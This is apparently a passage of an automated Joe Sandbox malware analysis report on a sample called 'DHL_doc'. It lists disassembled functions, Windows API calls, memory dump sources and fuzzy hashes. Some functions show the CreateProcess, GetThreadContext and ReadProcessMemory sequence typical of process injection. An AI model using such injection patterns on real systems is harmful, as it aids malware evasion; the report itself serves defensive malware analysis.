RegCloseKey.KERNELBASE(00000000,?,?,?,80000001,80000001,?,00EC3B0F,SwapMouseButtons,00000004,?), ref: 00EC3B83

Strings

Control Panel\Mouse, xrefs: 00EC3B3E

Memory Dump Source

Source File: 00000000.00000002.1706869650.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true

Associated: 00000000.00000002.1706854118.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706913103.0000000000F5C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706913103.0000000000F82000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706948687.0000000000F8C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706963068.0000000000F94000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ec0000_DHL_doc.jbxd

Similarity

API ID: CloseOpenQueryValue
String ID: Control Panel\Mouse
API String ID: 3677997916-824357125
Opcode ID: 42ca7919ba5f9abc8ff6d850c96bc35c7b8a7168a9e192f2f169d7eee38001bc
Instruction ID: b44384c850941454afa2da01916897c980f7d69aca7c12bc7622148c181b10c2
Opcode Fuzzy Hash: 42ca7919ba5f9abc8ff6d850c96bc35c7b8a7168a9e192f2f169d7eee38001bc
Instruction Fuzzy Hash: 91112AB5510308FFDB208FA5DD44EEFBBB9EF04755B109459B906E7110D2329E41ABA0

Function 024C12A0 Relevance: 6.7, APIs: 4, Instructions: 720
processthreadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessW.KERNELBASE(?,00000000), ref: 024C1A5B
Wow64GetThreadContext.KERNEL32(?,00010007), ref: 024C1AF1
ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 024C1B13

Memory Dump Source

Source File: 00000000.00000002.1707663242.00000000024C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_24c0000_DHL_doc.jbxd

Similarity

API ID: Process$ContextCreateMemoryReadThreadWow64
String ID:
API String ID: 2438371351-0
Opcode ID: ec40cea32e34b77dc66852b254e16eb814eeb5cb53dbe13a3b9b961a1e41453f
Instruction ID: 0154174759059f6b7e3f28437a98070a22fca54b30f254a804d475495f0f184d
Opcode Fuzzy Hash: ec40cea32e34b77dc66852b254e16eb814eeb5cb53dbe13a3b9b961a1e41453f
Instruction Fuzzy Hash: C3620B74A14658DBEB64CFA4C840BDEB372EF58300F2091AAD10DEB391E7759E81CB59

Function 00ECDFD0 Relevance: 6.7, APIs: 2, Strings: 1, Instructions: 1414COMMON

Download Yara Rule

Strings

Variable must be of type 'Object'., xrefs: 00F132B7

Memory Dump Source

Source File: 00000000.00000002.1706869650.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true

Associated: 00000000.00000002.1706854118.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706913103.0000000000F5C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706913103.0000000000F82000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706948687.0000000000F8C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706963068.0000000000F94000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ec0000_DHL_doc.jbxd

Similarity

API ID:
String ID: Variable must be of type 'Object'.
API String ID: 0-109567571
Opcode ID: 2f2bae70bcbd15464c34c4d5573630dd81d2b2882ad1a5f76c35b001482783d4
Instruction ID: b749c71b0daf29bf600f8534d9885860de0ec0646a4636c12ea450198dfba032
Opcode Fuzzy Hash: 2f2bae70bcbd15464c34c4d5573630dd81d2b2882ad1a5f76c35b001482783d4
Instruction Fuzzy Hash: 81C26871A00205DFCB24CF58C981FADB7F1BB08314F24916AE916BB391D376AD82DB91

Function 00EC3923 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 94
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadStringW.USER32(00000065,?,0000007F,00000104), ref: 00F033A2

Part of subcall function 00EC6B57: _wcslen.LIBCMT ref: 00EC6B6A

Shell_NotifyIconW.SHELL32(00000001,?), ref: 00EC3A04

Strings

Line: , xrefs: 00F033EB

Memory Dump Source

Source File: 00000000.00000002.1706869650.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true

Associated: 00000000.00000002.1706854118.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706913103.0000000000F5C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706913103.0000000000F82000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706948687.0000000000F8C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706963068.0000000000F94000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ec0000_DHL_doc.jbxd

Similarity

API ID: IconLoadNotifyShell_String_wcslen
String ID: Line:
API String ID: 2289894680-1585850449
Opcode ID: bb6f84ed47993ba8912a79027963359f83210aaf07d1e2b5da8431974d5620fa
Instruction ID: 3a79be48c48cc376ced9ab316cb193d36a59dc2dd913c1a33b2a9c3f38730942
Opcode Fuzzy Hash: bb6f84ed47993ba8912a79027963359f83210aaf07d1e2b5da8431974d5620fa
Instruction Fuzzy Hash: 2731F471908305AAD724EB20DC45FEFB3E8AB84714F00992EF599A30D1DB719A4AD7C2

Function 00EDFDDB Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 43COMMON

Download Yara Rule

APIs

__CxxThrowException@8.LIBVCRUNTIME ref: 00EE0668

Part of subcall function 00EE32A4: RaiseException.KERNEL32(?,?,?,00EE068A,?,00F91444,?,?,?,?,?,?,00EE068A,00EC1129,00F88738,00EC1129), ref: 00EE3304

__CxxThrowException@8.LIBVCRUNTIME ref: 00EE0685

Strings

Unknown exception, xrefs: 00EE0692

Memory Dump Source

Source File: 00000000.00000002.1706869650.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true

Associated: 00000000.00000002.1706854118.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706913103.0000000000F5C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706913103.0000000000F82000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706948687.0000000000F8C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706963068.0000000000F94000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ec0000_DHL_doc.jbxd

Similarity

API ID: Exception@8Throw$ExceptionRaise
String ID: Unknown exception
API String ID: 3476068407-410509341
Opcode ID: 5b6e5643c629bf7d510b4ea8b2a86560907a5e2ea9b0b571512ca75da7e778ba
Instruction ID: 1215e6b10ba8a1ae87d240cc74259b8799c7bdb126493f74749d0edcc0894eff
Opcode Fuzzy Hash: 5b6e5643c629bf7d510b4ea8b2a86560907a5e2ea9b0b571512ca75da7e778ba
Instruction Fuzzy Hash: E1F04C3080028D73CB00F676D846E9E77BD9E00344BA05031F914F65E1EFB0DA5AC6C1

Function 00F47F59 Relevance: 4.9, APIs: 3, Instructions: 430COMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(00000000,00000067,000000FF,?,?,?), ref: 00F482F5
TerminateProcess.KERNEL32(00000000), ref: 00F482FC
FreeLibrary.KERNEL32(?,?,?,?), ref: 00F484DD

Memory Dump Source

Source File: 00000000.00000002.1706869650.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true

Associated: 00000000.00000002.1706854118.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706913103.0000000000F5C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706913103.0000000000F82000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706948687.0000000000F8C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706963068.0000000000F94000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ec0000_DHL_doc.jbxd

Similarity

API ID: Process$CurrentFreeLibraryTerminate
String ID:
API String ID: 146820519-0
Opcode ID: dbe64e9578b25e580434bf23ff54319ec55f879c78e3b4d89f41d950aa929c8a
Instruction ID: 21f6634f2a779cf5280825fcb04c75757a8d8f79a9a7a53f44e9bfa12f94b7bd
Opcode Fuzzy Hash: dbe64e9578b25e580434bf23ff54319ec55f879c78e3b4d89f41d950aa929c8a
Instruction Fuzzy Hash: 5F127B71A083419FC714DF28C484B2EBBE1FF85364F14895DE8899B352DB35E946CB92

Function 00EC10F3 Relevance: 4.7, APIs: 3, Instructions: 153comCOMMON

Download Yara Rule

APIs

Part of subcall function 00EC1BC3: MapVirtualKeyW.USER32(0000005B,00000000), ref: 00EC1BF4
Part of subcall function 00EC1BC3: MapVirtualKeyW.USER32(00000010,00000000), ref: 00EC1BFC
Part of subcall function 00EC1BC3: MapVirtualKeyW.USER32(000000A0,00000000), ref: 00EC1C07
Part of subcall function 00EC1BC3: MapVirtualKeyW.USER32(000000A1,00000000), ref: 00EC1C12
Part of subcall function 00EC1BC3: MapVirtualKeyW.USER32(00000011,00000000), ref: 00EC1C1A
Part of subcall function 00EC1BC3: MapVirtualKeyW.USER32(00000012,00000000), ref: 00EC1C22

Part of subcall function 00EC1B4A: RegisterWindowMessageW.USER32(00000004,?,00EC12C4), ref: 00EC1BA2

GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 00EC136A
OleInitialize.OLE32 ref: 00EC1388
CloseHandle.KERNEL32(00000000,00000000), ref: 00F024AB

Memory Dump Source

Source File: 00000000.00000002.1706869650.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true

Associated: 00000000.00000002.1706854118.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706913103.0000000000F5C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706913103.0000000000F82000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706948687.0000000000F8C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706963068.0000000000F94000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ec0000_DHL_doc.jbxd

Similarity

API ID: Virtual$Handle$CloseInitializeMessageRegisterWindow
String ID:
API String ID: 1986988660-0
Opcode ID: b5f7870dc4909dd44677335ef2aa321412733c693f6f0c36b72ff24086c08abc
Instruction ID: 8a96f1fb48a9411e339804837f06587a2bce2912980d1d64bd69c41485266072
Opcode Fuzzy Hash: b5f7870dc4909dd44677335ef2aa321412733c693f6f0c36b72ff24086c08abc
Instruction Fuzzy Hash: FC71BAB490130A8FD785DF7AAE45A593AE0FB8934435A923FD51AD7362EB304406FF81

Function 00EF86AE Relevance: 4.6, APIs: 3, Instructions: 61COMMONLIBRARYCODE

Download Yara Rule

APIs

CloseHandle.KERNELBASE(00000000,00000000,?,?,00EF85CC,?,00F88CC8,0000000C), ref: 00EF8704
GetLastError.KERNEL32(?,00EF85CC,?,00F88CC8,0000000C), ref: 00EF870E
__dosmaperr.LIBCMT ref: 00EF8739

Memory Dump Source

Source File: 00000000.00000002.1706869650.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true

Associated: 00000000.00000002.1706854118.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706913103.0000000000F5C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706913103.0000000000F82000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706948687.0000000000F8C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706963068.0000000000F94000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ec0000_DHL_doc.jbxd

Similarity

API ID: CloseErrorHandleLast__dosmaperr
String ID:
API String ID: 2583163307-0
Opcode ID: 672ae803b42872011b94cd5de7dde541f9655a6def07b2d14a4150845c9ed7ce
Instruction ID: 0eed68accd4d67f6f3b160a0b85e7767b20954feabf7a9df3503ef3b01bad3ba
Opcode Fuzzy Hash: 672ae803b42872011b94cd5de7dde541f9655a6def07b2d14a4150845c9ed7ce
Instruction Fuzzy Hash: B2016F3360562C1AD22063346A4977E37C58B9277DF36211AFB04FB0D2DE608C818190

Function 00ED1310 Relevance: 4.0, APIs: 1, Strings: 1, Instructions: 531COMMON

Download Yara Rule

APIs

__Init_thread_footer.LIBCMT ref: 00ED17F6

Strings

CALL, xrefs: 00ED17C6

Memory Dump Source

Source File: 00000000.00000002.1706869650.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true

Associated: 00000000.00000002.1706854118.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706913103.0000000000F5C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706913103.0000000000F82000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706948687.0000000000F8C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706963068.0000000000F94000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ec0000_DHL_doc.jbxd

Similarity

API ID: Init_thread_footer
String ID: CALL
API String ID: 1385522511-4196123274
Opcode ID: fe46d00ad40eadebf2cbc39670bb2f645518430007b08f7c2f670b78657da106
Instruction ID: 995606cc13fce4e7277d8c17b5ca58169bd063c5963728377640ff773f03c2b8
Opcode Fuzzy Hash: fe46d00ad40eadebf2cbc39670bb2f645518430007b08f7c2f670b78657da106
Instruction Fuzzy Hash: 57227B70608241AFC714DF14C480B6ABBF1FF85314F18999EF496AB3A1D736E886DB52

Function 00EC2DE3 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 64COMMON

Download Yara Rule

APIs

GetOpenFileNameW.COMDLG32(?), ref: 00F02C8C

Part of subcall function 00EC3AA2: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00EC3A97,?,?,00EC2E7F,?,?,?,00000000), ref: 00EC3AC2

Part of subcall function 00EC2DA5: GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 00EC2DC4

Strings

X, xrefs: 00F02C5A

Memory Dump Source

Source File: 00000000.00000002.1706869650.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true

Associated: 00000000.00000002.1706854118.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706913103.0000000000F5C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706913103.0000000000F82000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706948687.0000000000F8C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706963068.0000000000F94000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ec0000_DHL_doc.jbxd

Similarity

API ID: Name$Path$FileFullLongOpen
String ID: X
API String ID: 779396738-3081909835
Opcode ID: 5b6ac8e4c43b932c453ce8b0b3fe717b6a11f564809dba229a7ce1b51cb951f8
Instruction ID: 5fefa688b6eb5a5d3e490069baebd60e5d946d383835a24cea193b48dc4e58f2
Opcode Fuzzy Hash: 5b6ac8e4c43b932c453ce8b0b3fe717b6a11f564809dba229a7ce1b51cb951f8
Instruction Fuzzy Hash: 4D219371E002589FDB41EF94C949BEE7BF8AF48314F00805DE505FB281DBB55A4A9FA1

Function 00EC3837 Relevance: 3.1, APIs: 2, Instructions: 77windowCOMMON

Download Yara Rule

APIs

Shell_NotifyIconW.SHELL32(00000000,?), ref: 00EC3908

Memory Dump Source

Source File: 00000000.00000002.1706869650.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true

Associated: 00000000.00000002.1706854118.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706913103.0000000000F5C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706913103.0000000000F82000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706948687.0000000000F8C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706963068.0000000000F94000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ec0000_DHL_doc.jbxd

Similarity

API ID: IconNotifyShell_
String ID:
API String ID: 1144537725-0
Opcode ID: 459a64894f559901a3573e7df161773091347e28efce28d3ad3e458227fbd955
Instruction ID: 2c7aad236c7970a507af1325e2fa9489c40550b36abf2b58e6034583cd05ef46
Opcode Fuzzy Hash: 459a64894f559901a3573e7df161773091347e28efce28d3ad3e458227fbd955
Instruction Fuzzy Hash: 0D3193719043059FD721DF34D985B97BBF8FB49708F00092EF59A93290E772AA44DB92

Function 00EC5745 Relevance: 3.1, APIs: 2, Instructions: 56fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000,?,?,?,00EC949C,?,00008000), ref: 00EC5773
CreateFileW.KERNEL32(?,C0000000,00000007,00000000,00000004,00000080,00000000,?,?,?,00EC949C,?,00008000), ref: 00F04052

Memory Dump Source

Source File: 00000000.00000002.1706869650.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true

Associated: 00000000.00000002.1706854118.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706913103.0000000000F5C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706913103.0000000000F82000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706948687.0000000000F8C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706963068.0000000000F94000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ec0000_DHL_doc.jbxd

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 99639a473adf44c0d687d1f6e4957ae6b733a1faed7be63244dc5ddbe5614c2e
Instruction ID: 3aac451d9942b76eebbf533f624e7b4a06ca6f0999e7ae544c9d34c5ec4eead1
Opcode Fuzzy Hash: 99639a473adf44c0d687d1f6e4957ae6b733a1faed7be63244dc5ddbe5614c2e
Instruction Fuzzy Hash: EC018431145725B6E3310A25CD0EF977F98EF027B4F108205BA5D6A1E0C7B56495DB90

Function 00ECB710 Relevance: 2.1, APIs: 1, Instructions: 587COMMON

Download Yara Rule

APIs

__Init_thread_footer.LIBCMT ref: 00ECBB4E

Memory Dump Source

Source File: 00000000.00000002.1706869650.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true

Associated: 00000000.00000002.1706854118.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706913103.0000000000F5C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706913103.0000000000F82000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706948687.0000000000F8C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706963068.0000000000F94000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ec0000_DHL_doc.jbxd

Similarity

API ID: Init_thread_footer
String ID:
API String ID: 1385522511-0
Opcode ID: f876be7498847a2ac7f191168943be29fe1bfcd9c8d0a3cca81e7afb1b6aa138
Instruction ID: 0d6d987c30c5d5a08d0ee61107bb762373f5a9e194f69c1721a9e1672b6da78f
Opcode Fuzzy Hash: f876be7498847a2ac7f191168943be29fe1bfcd9c8d0a3cca81e7afb1b6aa138
Instruction Fuzzy Hash: 3A32EC31A00209AFDB14CF54C986FFEB7B9EF44314F14905AE905BB251CBB6AD82DB91

Function 024C129D Relevance: 1.9, APIs: 1, Instructions: 400processthreadCOMMON

Download Yara Rule

APIs

CreateProcessW.KERNELBASE(?,00000000), ref: 024C1A5B
Wow64GetThreadContext.KERNEL32(?,00010007), ref: 024C1AF1
ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 024C1B13

Memory Dump Source

Source File: 00000000.00000002.1707663242.00000000024C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_24c0000_DHL_doc.jbxd

Similarity

API ID: Process$ContextCreateMemoryReadThreadWow64
String ID:
API String ID: 2438371351-0
Opcode ID: 1e5ff81ed8f871418fabb2f1fb9f15c50bab29dc79b391b745a61db8bf218849
Instruction ID: d96fdd435a2a82d60c041ea31f0281fbb8bafb1191d89b696122069ff2b0222b
Opcode Fuzzy Hash: 1e5ff81ed8f871418fabb2f1fb9f15c50bab29dc79b391b745a61db8bf218849
Instruction Fuzzy Hash: 9612BD24E24658C6EB24DF64D8507DEB232EF68300F1090ED910DEB7A5E77A4E81CF5A

Function 00EC4ECB Relevance: 1.6, APIs: 1, Instructions: 65libraryCOMMON

Download Yara Rule

APIs

Part of subcall function 00EC4E90: LoadLibraryA.KERNEL32(kernel32.dll,?,?,00EC4EDD,?,00F91418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00EC4E9C
Part of subcall function 00EC4E90: GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 00EC4EAE
Part of subcall function 00EC4E90: FreeLibrary.KERNEL32(00000000,?,?,00EC4EDD,?,00F91418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00EC4EC0

LoadLibraryExW.KERNEL32(?,00000000,00000002,?,00F91418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00EC4EFD

Part of subcall function 00EC4E59: LoadLibraryA.KERNEL32(kernel32.dll,?,?,00F03CDE,?,00F91418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00EC4E62
Part of subcall function 00EC4E59: GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00EC4E74
Part of subcall function 00EC4E59: FreeLibrary.KERNEL32(00000000,?,?,00F03CDE,?,00F91418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00EC4E87

Memory Dump Source

Source File: 00000000.00000002.1706869650.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true

Associated: 00000000.00000002.1706854118.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706913103.0000000000F5C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706913103.0000000000F82000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706948687.0000000000F8C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706963068.0000000000F94000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ec0000_DHL_doc.jbxd

Similarity

API ID: Library$Load$AddressFreeProc
String ID:
API String ID: 2632591731-0
Opcode ID: 5d4af75c80f379cd4d0ec5c092f971713f0007249284193a884b20f9e772aa27
Instruction ID: 2375b45ab2b3682ff577383e994a6a58ae7bba2b9f7937b48ff55f7a3041cd19
Opcode Fuzzy Hash: 5d4af75c80f379cd4d0ec5c092f971713f0007249284193a884b20f9e772aa27
Instruction Fuzzy Hash: 72112772700305AEDB10EB60DE12FAD77E59F40710F10942DF542BA2C1EE72AA46A790

Function 00EF8402 Relevance: 1.6, APIs: 1, Instructions: 54COMMON

Download Yara Rule

APIs

__wsopen_s.LIBCMT ref: 00EF8440

Memory Dump Source

Source File: 00000000.00000002.1706869650.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true

Associated: 00000000.00000002.1706854118.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706913103.0000000000F5C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706913103.0000000000F82000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706948687.0000000000F8C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706963068.0000000000F94000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ec0000_DHL_doc.jbxd

Similarity

API ID: __wsopen_s
String ID:
API String ID: 3347428461-0
Opcode ID: f76123ada1e8aeca1dfde5c26c1154b496ecc65b6ef21389c9c878affc8613bf
Instruction ID: 5f0075ef97e0b96aed26277dc73518e61cd9bd21dd6e3b917dd6a6389ef385d5
Opcode Fuzzy Hash: f76123ada1e8aeca1dfde5c26c1154b496ecc65b6ef21389c9c878affc8613bf
Instruction Fuzzy Hash: 1911487190410EAFCB05DF58E9419AE7BF4EF48304F104059F918AB312DB30DA11CBA4

Function 00EF5000 Relevance: 1.6, APIs: 1, Instructions: 52COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00EF4C7D: RtlAllocateHeap.NTDLL(00000008,00EC1129,00000000,?,00EF2E29,00000001,00000364,?,?,?,00EEF2DE,00EF3863,00F91444,?,00EDFDF5,?), ref: 00EF4CBE

_free.LIBCMT ref: 00EF506C

Memory Dump Source

Source File: 00000000.00000002.1706869650.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true

Associated: 00000000.00000002.1706854118.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706913103.0000000000F5C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706913103.0000000000F82000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706948687.0000000000F8C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706963068.0000000000F94000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ec0000_DHL_doc.jbxd

Similarity

API ID: AllocateHeap_free
String ID:
API String ID: 614378929-0
Opcode ID: 9ba45ce058d1080761d5af908226540236078fd1fc19e2e0238d0ad147f07c6e
Instruction ID: 43bafa0bd62c72625e4714adf256e95395ebb7cf87e7c91d2e3c4e181f62cfb4
Opcode Fuzzy Hash: 9ba45ce058d1080761d5af908226540236078fd1fc19e2e0238d0ad147f07c6e
Instruction Fuzzy Hash: 05012B732047095BE3218E65984196AFBE8FB85370F65051DE394A32C0EA706905C674

Function 00EEE602 Relevance: 1.5, APIs: 1, Instructions: 46COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1706869650.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true

Associated: 00000000.00000002.1706854118.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706913103.0000000000F5C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706913103.0000000000F82000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706948687.0000000000F8C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706963068.0000000000F94000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ec0000_DHL_doc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d6c69ec2a70ac845cc05b5f137181c3f07394ab8b33ef369e8c7ef627d5c9574
Instruction ID: 59c7e065b2e7f46d57ef89c880ebcf143552e09509d9d7a52a73b1b39a79f4ae
Opcode Fuzzy Hash: d6c69ec2a70ac845cc05b5f137181c3f07394ab8b33ef369e8c7ef627d5c9574
Instruction Fuzzy Hash: EFF0F432511E5D96DA313A6B9C05BAA33D89F92334F102719F621B33D2DB70D80186A5

Function 00EF4C7D Relevance: 1.5, APIs: 1, Instructions: 39memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00000008,00EC1129,00000000,?,00EF2E29,00000001,00000364,?,?,?,00EEF2DE,00EF3863,00F91444,?,00EDFDF5,?), ref: 00EF4CBE

Memory Dump Source

Source File: 00000000.00000002.1706869650.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true

Associated: 00000000.00000002.1706854118.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706913103.0000000000F5C000.00000002.00000001.01000000.00000003.sdmpDownload File
